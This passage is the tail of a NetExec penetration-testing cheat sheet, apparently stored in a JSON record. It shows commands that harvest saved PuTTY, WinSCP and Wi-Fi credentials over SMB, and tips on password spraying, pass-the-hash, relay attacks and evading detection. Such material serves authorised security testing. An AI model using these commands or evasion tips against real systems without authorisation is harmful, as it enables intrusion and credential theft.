keepass_discover\n\n# Application credentials\nnxc smb 192.168.1.10 -u admin -p pass -M putty\nnxc smb 192.168.1.10 -u admin -p pass -M winscp\nnxc smb 192.168.1.10 -u admin -p pass -M wifi\n```\n\n---\n\n## Tips & Best Practices\n\n- Use `--continue-on-success` for password spraying to find all valid credentials\n- Use `--no-bruteforce` to stop after first valid credential per host (avoid lockouts)\n- Add `--jitter` to introduce random delays and avoid detection\n- Use `--ufail-limit` and `--fail-limit` to prevent account lockouts\n- Check SMB signing with basic scan before relay attacks\n- Use LDAP for domain enumeration (less noisy than SMB)\n- Pass-the-Hash only needs NTLM hash (not LM)\n- Always specify `-d DOMAIN` or `--local-auth` explicitly\n- Use `cmedb` to review all findings in the database\n- Module options: `-M module_name -o OPTION=value`\n- Rate limit yourself to avoid account lockouts and detection\n- Use `--no-progress` when logging output to files\n- Test authentication across multiple protocols (SMB, WinRM, RDP, MSSQL)\n\n---\n\n## Resources\n\n- **GitHub**: https://github.com/Pennyw0rth/NetExec\n- **Wiki**: https://www.netexec.wiki/\n- **Modules**: https://www.netexec.wiki/getting-started/using-modules", "creation_timestamp": "2026-05-26T06:17:22.000000Z"}]}